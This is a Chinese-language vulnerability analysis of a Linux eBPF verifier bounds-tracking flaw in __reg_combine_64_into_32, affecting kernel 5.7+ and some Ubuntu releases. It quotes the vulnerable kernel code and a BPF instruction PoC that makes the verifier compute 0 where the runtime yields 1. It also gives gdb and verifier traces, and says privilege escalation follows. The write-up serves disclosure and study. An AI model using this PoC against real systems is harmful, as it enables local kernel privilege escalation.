前言
这个洞我在年初时发现的,因为能提权便留在手中,结果不幸被Pwn2Own给撞了,现在ZDI官方博客也出了分析,我就将之前自己记录的分析发一下。当时发现这个洞,是看到下面commit修复的一个漏洞:
补丁解释如下:
bpf: Fix propagation of 32-bit signed bounds from 64-bit bounds.
The 64-bit signed bounds should not affect 32-bit signed bounds unless the
verifier knows that upper 32-bits are either all 1s or all 0s. For example the
register with smin_value==1 doesn't mean that s32_min_value is also equal to 1,
since smax_value could be larger than 32-bit subregister can hold.
The verifier refines the smax/s32_max return value from certain helpers in
do_refine_retval_range(). Teach the verifier to recognize that smin/s32_min
value is also bounded. When both smin and smax bounds fit into 32-bit
subregister the verifier can propagate those bounds.
漏洞代码认为有符号64位最小值为1时,32位最小值也为1,其实不一定:64位的最小值和32位的最小值并不一定相等,两者并没有必然关系。例如64位有符号数的最小值为0x1ffffffff时,32位最小值就为-1了。可以联想到无符号数也是这种情况:无符号64位最小值也不一定等于32位无符号的最小值,例如64位无符号的最小值为0x100000000时,32位无符号的最小值就为0。但看了代码,发现开发者并没有修补无符号的情况。这个漏洞的本质原因是对64位范围的判断影响到了32位范围。
漏洞影响
影响Linux kernel 5.7 及以上
目前还影响最新版的Ubuntu 20.04/20.10,应该还有其它发行版,没有一一测试了。
漏洞分析
漏洞调用链如下:
#0 __reg32_deduce_bounds (reg=reg@entry=0xffff88801f9b0800) at kernel/bpf/verifier.c:1254
#1 0xffffffff81157c67 in __reg_deduce_bounds (reg=0xffff88801f9b0800) at kernel/bpf/verifier.c:1387
#2 __reg_combine_64_into_32 (reg=reg@entry=0xffff88801f9b0800) at kernel/bpf/verifier.c:1387
#3 0xffffffff8115818d in reg_set_min_max (true_reg=0xffff88801f9b2000, false_reg=false_reg@entry=0xffff88801f9b0800, val=<optimized out>, val32=2415919103,
opcode=opcode@entry=176 '\260', is_jmp32=is_jmp32@entry=false) at kernel/bpf/verifier.c:7750
#4 0xffffffff81166397 in check_cond_jmp_op (insn_idx=0xffff88800324e000, insn=0xffffc9000002d0e8, env=0xffff88800324e000) at kernel/bpf/verifier.c:8142
#5 do_check (env=0xffff88800324e000) at kernel/bpf/verifier.c:10169
#6 do_check_common (env=env@entry=0xffff88800324e000, subprog=subprog@entry=0) at kernel/bpf/verifier.c:12042
#7 0xffffffff81169909 in do_check_main (env=0xffff88800324e000) at kernel/bpf/verifier.c:12108
漏洞点在于__reg_combine_64_into_32 函数:
/*
 * Derive the 32-bit sub-register bounds of @reg from its 64-bit bounds.
 *
 * @reg: register state whose s32_* / u32_* min/max fields are rewritten.
 *
 * The 32-bit bounds are first reset through __mark_reg32_unbounded(), then
 * refilled from whichever 64-bit bounds pass the __reg64_bound_s32() /
 * __reg64_bound_u32() checks, and finally the deduce/offset/update helpers
 * are run on the result.
 *
 * NOTE(review): this is the version the surrounding write-up analyses as
 * vulnerable; it is quoted as-is and intentionally left unmodified.
 */
static void __reg_combine_64_into_32(struct bpf_reg_state *reg)
{
__mark_reg32_unbounded(reg);
/* Signed case: the 64-bit bounds are copied only when BOTH smin and smax
 * pass the 32-bit check.
 */
if (__reg64_bound_s32(reg->smin_value) && __reg64_bound_s32(reg->smax_value)) {
reg->s32_min_value = (s32)reg->smin_value;
reg->s32_max_value = (s32)reg->smax_value;
}
/* Unsigned case: umin and umax are tested independently of each other,
 * unlike the signed case above. The write-up identifies this as the flaw:
 * with umin = 0x90000000 and umax = 0x7fffffffffffffff only the first
 * check passes, so u32_min_value becomes 0x90000000 while u32_max_value
 * keeps 0xffffffff, although a value such as 0x180000000 satisfies the
 * 64-bit bounds and has a low word of 0x80000000.
 */
if (__reg64_bound_u32(reg->umin_value))
reg->u32_min_value = (u32)reg->umin_value;
if (__reg64_bound_u32(reg->umax_value))
reg->u32_max_value = (u32)reg->umax_value;
/* Intersecting with the old var_off might have improved our bounds
* slightly. e.g. if umax was 0x7f...f and var_off was (0; 0xf...fc),
* then new var_off is (0; 0x7f...fc) which improves our umax.
*/
__reg_deduce_bounds(reg);
__reg_bound_offset(reg);
__update_reg_bounds(reg);
}
构造Poc来验证:
/* PoC instruction sequence (fragment of a BPF instruction array). The
 * per-instruction notes follow the verifier log shown later in the write-up.
 */
/* r9 = map pointer for exp_mapfd */
BPF_LD_MAP_FD(BPF_REG_9,exp_mapfd),
/* BPF_MAP_GET is a helper macro not shown here; presumably it looks up
 * element 0 and loads its value into r5 - the trace describes r5 as
 * "the number passed in through the map". TODO confirm against the macro.
 */
BPF_MAP_GET(0,BPF_REG_5),
/* keep copies of r0 in r8 and r7 (shown as map_value in the trace) */
BPF_MOV64_REG(BPF_REG_8, BPF_REG_0),
BPF_MOV64_REG(BPF_REG_7, BPF_REG_0),
/* r0 = r5: the attacker-controlled 64-bit value */
BPF_MOV64_REG(BPF_REG_0, BPF_REG_5),
/* if r0 s>= 1 skip the exit below; the verifier now tracks umin_value = 1 */
BPF_JMP_IMM(BPF_JSGE, BPF_REG_0, 1, 1),
BPF_EXIT_INSN(),
/* r2 = 0x8fffffff */
BPF_LD_IMM64(BPF_REG_2, 0x8fffffff),
/* 64-bit unsigned compare: if r0 > r2 skip the exit below. On this path
 * the verifier wrongly derives the 32-bit range [0x90000000, 0xffffffff].
 */
BPF_JMP_REG(BPF_JGT, BPF_REG_0, BPF_REG_2, 1),
BPF_EXIT_INSN(),
/* w0 = w0: truncate to the low 32 bits, keeping the bogus 32-bit range */
BPF_MOV32_REG(BPF_REG_0, BPF_REG_0),
/* w0 += 0x70000000: verifier believes the result is in [0, 0x6fffffff] */
BPF_ALU32_IMM(BPF_ADD, BPF_REG_0, 0x70000000),
/* r0 >>= 31: verifier believes 0; at runtime it is 1 for r5 = 0x180000000 */
BPF_ALU64_IMM(BPF_RSH, BPF_REG_0, 31),
在经过 BPF_JMP_REG(BPF_JGT, BPF_REG_0, BPF_REG_2, 1) 这条条件比较指令之前,r0寄存器的状态如下:
(gdb) p/x *reg
$5 = {type = 0x1, off = 0x0, {range = 0x0, map_ptr = 0x0, {btf = 0x0, btf_id = 0x0}, mem_size = 0x0, raw = {raw1 = 0x0, raw2 = 0x0}}, id = 0x2, ref_obj_id = 0x0,
var_off = {value = 0x0, mask = 0x7fffffffffffffff}, smin_value = 0x1, smax_value = 0x7fffffffffffffff, umin_value = 0x1, umax_value = 0x7fffffffffffffff,
s32_min_value = 0x80000000, s32_max_value = 0x7fffffff, u32_min_value = 0x0, u32_max_value = 0xffffffff, parent = 0xffff88801f9b2000, frameno = 0x0, subreg_def = 0x0,
live = 0x0, precise = 0x1}
进行比较时,在__reg_combine_64_into_32函数中修改了u32_min_value 的值:
/*
 * Derive the 32-bit sub-register bounds of @reg from its 64-bit bounds
 * (annotated copy; the [1]/[2] markers are referenced by the write-up).
 *
 * @reg: register state whose s32_* / u32_* min/max fields are rewritten.
 */
static void __reg_combine_64_into_32(struct bpf_reg_state *reg)
{
__mark_reg32_unbounded(reg);
/* Signed bounds are copied only when both smin and smax pass the check. */
if (__reg64_bound_s32(reg->smin_value) && __reg64_bound_s32(reg->smax_value)) {
reg->s32_min_value = (s32)reg->smin_value;
reg->s32_max_value = (s32)reg->smax_value;
}
if (__reg64_bound_u32(reg->umin_value)) // <------ [1]
reg->u32_min_value = (u32)reg->umin_value;
if (__reg64_bound_u32(reg->umax_value)) // <------ [2]
reg->u32_max_value = (u32)reg->umax_value;
/* Author's note: the deeper root cause is that reg->umax_value is not
 * constrained here. If it is larger than 0xffffffff, then by the time
 * __reg_deduce_bounds() runs the effect resembles a truncation and the
 * range ends up with reg->u32_max_value = 0xffffffff. The patch should
 * therefore combine both checks with &&, as the signed case above does.
 *
 * Only when the maximum also lies within the 32-bit range is the 64-bit
 * minimum really the 32-bit minimum.
 */
/* Intersecting with the old var_off might have improved our bounds
* slightly. e.g. if umax was 0x7f...f and var_off was (0; 0xf...fc),
* then new var_off is (0; 0x7f...fc) which improves our umax.
*/
__reg_deduce_bounds(reg);
__reg_bound_offset(reg);
__update_reg_bounds(reg);
}
修改成了:
(gdb) p/x *reg
$7 = {type = 0x1, off = 0x0, {range = 0x0, map_ptr = 0x0, {btf = 0x0, btf_id = 0x0}, mem_size = 0x0, raw = {raw1 = 0x0, raw2 = 0x0}}, id = 0x2, ref_obj_id = 0x0,
var_off = {value = 0x0, mask = 0x7fffffffffffffff}, smin_value = 0x1, smax_value = 0x7fffffffffffffff, umin_value = 0x90000000, umax_value = 0x7fffffffffffffff,
s32_min_value = 0x80000000, s32_max_value = 0x7fffffff, u32_min_value = 0x90000000, u32_max_value = 0xffffffff, parent = 0xffff88801f9b2000, frameno = 0x0,
subreg_def = 0x0, live = 0x0, precise = 0x1}
__reg_combine_64_into_32 函数中的 [1] 处认为 reg->umin_value 在32位的范围内,就将 reg->u32_min_value 设为 (u32)reg->umin_value,导致 reg->u32_min_value=0x90000000;[2] 处的条件不成立,reg->u32_max_value 保持为 0xffffffff。而后经过 __reg32_deduce_bounds 函数:
/*
 * Cross-refine the 32-bit signed and unsigned bounds of @reg.
 *
 * @reg: register state; s32_min/max_value and u32_min/max_value are
 *       tightened in place.
 *
 * Three cases are handled:
 *  - the signed range does not cross the sign boundary: signed and unsigned
 *    bounds are merged into one common range;
 *  - otherwise, the unsigned maximum is non-negative when viewed as s32:
 *    the unsigned bounds are used to tighten the signed ones;
 *  - otherwise, the unsigned minimum is negative when viewed as s32:
 *    likewise, on the negative side.
 * If none applies the bounds are left unchanged.
 */
static void __reg32_deduce_bounds(struct bpf_reg_state *reg)
{
/* Learn sign from signed bounds.
* If we cannot cross the sign boundary, then signed and unsigned bounds
* are the same, so combine. This works even in the negative case, e.g.
* -3 s<= x s<= -1 implies 0xf...fd u<= x u<= 0xf...ff.
*/
if (reg->s32_min_value >= 0 || reg->s32_max_value < 0) {
reg->s32_min_value = reg->u32_min_value =
max_t(u32, reg->s32_min_value, reg->u32_min_value);
reg->s32_max_value = reg->u32_max_value =
min_t(u32, reg->s32_max_value, reg->u32_max_value);
return;
}
/* Learn sign from unsigned bounds. Signed bounds cross the sign
* boundary, so we must be careful.
*/
if ((s32)reg->u32_max_value >= 0) {
/* Positive. We can't learn anything from the smin, but smax
* is positive, hence safe.
*/
reg->s32_min_value = reg->u32_min_value;
reg->s32_max_value = reg->u32_max_value =
min_t(u32, reg->s32_max_value, reg->u32_max_value);
} else if ((s32)reg->u32_min_value < 0) { //<----- [1]
/* Negative. We can't learn anything from the smax, but smin
* is negative, hence safe.
*/
/* In the write-up's PoC this branch is taken with
 * u32_min_value = 0x90000000 and u32_max_value = 0xffffffff:
 * s32_min_value goes from 0x80000000 to 0x90000000 and
 * s32_max_value becomes 0xffffffff (-1), i.e. the bogus unsigned
 * range is propagated into the signed 32-bit bounds as well.
 */
reg->s32_min_value = reg->u32_min_value =
max_t(u32, reg->s32_min_value, reg->u32_min_value); // <----- [2]
reg->s32_max_value = reg->u32_max_value;
}
}
[1] 处由于(s32)reg->u32_min_value=(s32)0x90000000 < 0 进入判断,在[2]处对reg->s32_min_value进行赋值,reg->s32_min_value之前的值为0x80000000,取最大值reg->s32_min_value=0x90000000 ,reg->s32_max_value=0xffffffff,而条件判断:if r0 <= r2(0x8fffffff) 是64位操作数的比较,32位操作数的范围是不确定的,但现在32位却得到范围[0x90000000, 0xffffffff],最终我们通过w0=w0单独取出32位进行操作,导致检查范围出现错误,进而提权。
漏洞根本成因在于__reg_combine_64_into_32 对于范围的操作,通过64位的范围影响到了32位的范围。
检查过程如下:
12: (bf) r0 = r5 // r5 为map传进来的数
13: R0_w=invP(id=0) R5_w=invP(id=0) R7_w=map_value(id=0,off=0,ks=4,vs=256,imm=0) R8_w=map_value(id=0,off=0,ks=4,vs=256,imm=0) R9=map_ptr(id=0,off=0,ks=4,vs=256,imm=0) R10=fp0 fp-8=mmmm????
13: (75) if r0 s>= 0x1 goto pc+1 // 对1进行有符号比较
R0_w=invP(id=0,smax_value=0) R5_w=invP(id=0) R7_w=map_value(id=0,off=0,ks=4,vs=256,imm=0) R8_w=map_value(id=0,off=0,ks=4,vs=256,imm=0) R9=map_ptr(id=0,off=0,ks=4,vs=256,imm=0) R10=fp0 fp-8=mmmm????
14: R0_w=invP(id=0,smax_value=0) R5_w=invP(id=0) R7_w=map_value(id=0,off=0,ks=4,vs=256,imm=0) R8_w=map_value(id=0,off=0,ks=4,vs=256,imm=0) R9=map_ptr(id=0,off=0,ks=4,vs=256,imm=0) R10=fp0 fp-8=mmmm????
14: (95) exit
15: R0_w=invP(id=0,umin_value=1,umax_value=9223372036854775807,var_off=(0x0; 0x7fffffffffffffff)) R5_w=invP(id=0) R7_w=map_value(id=0,off=0,ks=4,vs=256,imm=0) R8_w=map_value(id=0,off=0,ks=4,vs=256,imm=0) R9=map_ptr(id=0,off=0,ks=4,vs=256,imm=0) R10=fp0 fp-8=mmmm????
15: (18) r2 = 0x8fffffff // 此时认为r0的范围为:[1,0x7fffffffffffffff]
17: R0_w=invP(id=0,umin_value=1,umax_value=9223372036854775807,var_off=(0x0; 0x7fffffffffffffff)) R2_w=invP2415919103 R5_w=invP(id=0) R7_w=map_value(id=0,off=0,ks=4,vs=256,imm=0) R8_w=map_value(id=0,off=0,ks=4,vs=256,imm=0) R9=map_ptr(id=0,off=0,ks=4,vs=256,imm=0) R10=fp0 fp-8=mmmm????
17: (2d) if r0 > r2 goto pc+1 // 此时对r2进行无符号比较
R0_w=invP(id=0,umin_value=1,umax_value=2415919103,var_off=(0x0; 0xffffffff)) R2_w=invP2415919103 R5_w=invP(id=0) R7_w=map_value(id=0,off=0,ks=4,vs=256,imm=0) R8_w=map_value(id=0,off=0,ks=4,vs=256,imm=0) R9=map_ptr(id=0,off=0,ks=4,vs=256,imm=0) R10=fp0 fp-8=mmmm????
18: R0_w=invP(id=0,umin_value=1,umax_value=2415919103,var_off=(0x0; 0xffffffff)) R2_w=invP2415919103 R5_w=invP(id=0) R7_w=map_value(id=0,off=0,ks=4,vs=256,imm=0) R8_w=map_value(id=0,off=0,ks=4,vs=256,imm=0) R9=map_ptr(id=0,off=0,ks=4,vs=256,imm=0) R10=fp0 fp-8=mmmm????
18: (95) exit // 得到r0的64位范围为[0x90000000,0x7fffffffffffffff],32位范围为:[0x90000000, 0xffffffff],这里检查就出现了错误:64位操作数的比较,32位的范围应该是不清楚的,但却得到范围[0x90000000, 0xffffffff],只要传进来的数32位部分不在此范围,就可以触发漏洞
19: R0=invP(id=0,umin_value=2415919104,umax_value=9223372036854775807,var_off=(0x80000000; 0x7fffffff7fffffff),s32_min_value=-1879048192,s32_max_value=-1) R2=invP2415919103 R5=invP(id=0) R7=map_value(id=0,off=0,ks=4,vs=256,imm=0) R8=map_value(id=0,off=0,ks=4,vs=256,imm=0) R9=map_ptr(id=0,off=0,ks=4,vs=256,imm=0) R10=fp0 fp-8=mmmm????
19: (bc) w0 = w0 // 对64位进行截断,只看32位部分,范围依旧是[0x90000000, 0xffffffff]
20: R0_w=invP(id=0,smin_value=0,umin_value=2415919104,umax_value=4294967295,var_off=(0x80000000; 0x7fffffff),s32_min_value=-1879048192,s32_max_value=-1) R2=invP2415919103 R5=invP(id=0) R7=map_value(id=0,off=0,ks=4,vs=256,imm=0) R8=map_value(id=0,off=0,ks=4,vs=256,imm=0) R9=map_ptr(id=0,off=0,ks=4,vs=256,imm=0) R10=fp0 fp-8=mmmm????
20: (04) w0 += 1879048192 // w0+=0x70000000,得到范围为[0,0x6fffffff]
21: R0_w=invP(id=0,umax_value=1879048191,var_off=(0x0; 0x7fffffff)) R2=invP2415919103 R5=invP(id=0) R7=map_value(id=0,off=0,ks=4,vs=256,imm=0) R8=map_value(id=0,off=0,ks=4,vs=256,imm=0) R9=map_ptr(id=0,off=0,ks=4,vs=256,imm=0) R10=fp0 fp-8=mmmm????
21: (77) r0 >>= 31 // 右移31位,取32位范围的符号位,因为认为范围是[0,0x6fffffff],所以结果恒为0
22: R0_w=invP0 R2=invP2415919103 R5=invP(id=0) R7=map_value(id=0,off=0,ks=4,vs=256,imm=0) R8=map_value(id=0,off=0,ks=4,vs=256,imm=0) R9=map_ptr(id=0,off=0,ks=4,vs=256,imm=0) R10=fp0 fp-8=mmmm????
而实际运行过程:
12: (bf) r0 = r5 // 传进r5=0x180000000
13: (75) if r0 s>= 0x1 goto pc+1 // r0 >= 0x1, 跳转
14: (95) exit
15: (18) r2 = 0x8fffffff
17: (2d) if r0 > r2 goto pc+1 // r0 > 0x8fffffff,跳转
18: (95) exit
19: (bc) w0 = w0 // 截断,w0 = 0x80000000
20: (04) w0 += 1879048192 // w0+=0x70000000=0xf0000000
21: (77) r0 >>= 31 // r0 >>= 31 = 0xf0000000 >> 31 = 1
所以最终检查认为r0为0,而实际运行r0为1,参照eBPF的漏洞利用,可以完成提权,但现在eBPF模块对越界读写问题开始重新检查,会影响提权利用,在Pwn2Own 2021之后的利用得对这些检查进行绕过。
最新版Ubuntu 20.10 利用效果图: